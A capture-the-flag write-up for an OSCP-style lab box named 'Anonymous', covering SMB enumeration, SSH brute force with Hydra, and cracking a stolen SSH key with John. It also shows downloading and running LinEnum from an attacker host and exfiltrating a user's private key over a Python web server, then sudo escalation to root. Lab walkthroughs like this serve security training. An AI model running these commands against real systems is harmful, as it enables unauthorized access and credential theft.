Anonymous | Linux
Difficulty: Medium
Tags: SMB, SSH brute force, SSH key cracking, privesc, sudo
Tools Used: Nmap, smbmap, smbclient, Hydra, LinEnum, ssh2john, John the Ripper

This box is the kind of grind OSCP is built on: recon, password spray, stolen keys, and a good old-fashioned sudo -l. It’s not flashy. It’s precise. Each step leads to the next, if you’re paying attention. SMB drops usernames, brute gets you in, and a user’s home directory hands you root on a silver platter. 🔐

Initial Recon: Laying the Groundwork

Every hunt starts with recon. I ran a full Nmap scan to surface the attack surface:

nmap -sC -sV -T4 10.10.44.87

Services lit up:

• 22/tcp — SSH (OpenSSH 7.2p2)

• 80/tcp — HTTP (Apache 2.4.18)

• 139/445 — SMB (Samba smbd 4.3.11)

• 8009 — AJP

• 8080 — HTTP proxy

With multiple web services and SMB live, it was time to pick a direction.

SMB Enumeration: First Foothold

Checked for open shares with smbmap:

smbmap -H 10.10.44.87

Result:

• Anonymous — read-only

• IPC$ — no access

Connected to the anonymous share:

smbclient //10.10.44.87/Anonymous

Found: staff.txt listing two users — jan and kay — along with a warning about uploading non-work-related files.

That kind of language often hints at a file upload vuln elsewhere. Logged for later.

Web App Analysis: A Red Herring

Inspected Apache. Saw a reference to version 2.5.12 — unusual and suspicious. Ran a quick check with searchsploit, found an exploit, and attempted to run it.

No luck. Dead end.

Rather than burn time on unreliable web vulns, I pivoted to a faster win: brute force against SSH using the usernames from staff.txt.

SSH Brute Force: Breaking in as Jan

Launched Hydra:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87

Hit:

jan:armando

Logged in:

ssh jan@10.10.44.87

First blood:

cat user.txt

Dropped LinEnum to scout for privesc:

cd /dev/shm
wget http://<attacker-ip>:31337/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

SSH Keys Discovered: Eyes on Kay

LinEnum flagged an .ssh directory under /home/kay. Peeked inside:

ls -la /home/kay/.ssh

Private key found: id_rsa

Hosted it locally:

cd /home/kay/.ssh
python3 -m http.server 5555

Pulled it from the attacker machine:

wget http://10.10.81.85:5555/id_rsa

Cracking the SSH Key

Converted the private key for John:

ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cracked passphrase:

b-----x

Logged in as Kay:

ssh -i id_rsa kay@10.10.81.85

Privilege Escalation via Sudo

Found backup_password.txt — useless on its own, but combined with sudo? That’s gold.

Checked permissions:

sudo -l

Jackpot:

(ALL : ALL) ALL

Root access without password.

Final move:

sudo cat /root/flag.txt

Owned.

Summary / Review

Anonymous was a chain of small wins:

Foothold:

• SMB gave up usernames

• Hydra cracked Jan’s SSH password

• SSH ➤ user flag

Pivot:

• LinEnum ➤ SSH key in kay’s .ssh

• Cracked with ssh2john + John

• SSH login as Kay

Root:

• sudo -l showed full permissions

• Escalated to root without resistance

Command Recap

nmap -sC -sV -T4 10.10.44.87  
smbmap -H 10.10.44.87  
smbclient //10.10.44.87/Anonymous  
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87  
ssh jan@10.10.44.87  
wget http://<attacker-ip>:31337/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh  
cd /home/kay/.ssh && python3 -m http.server 5555  
wget http://10.10.81.85:5555/id_rsa  
ssh2john id_rsa > id_rsa_for_john.txt  
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt  
ssh -i id_rsa kay@10.10.81.85  
sudo -l  
sudo cat /root/flag.txt

Final Thoughts

Enum gave us usernames
Brute gave us keys
Homes gave us creds
Sudo gave us root

No fancy 0days. Just sharp tools and sharper instincts.

Another one rooted. On to the next.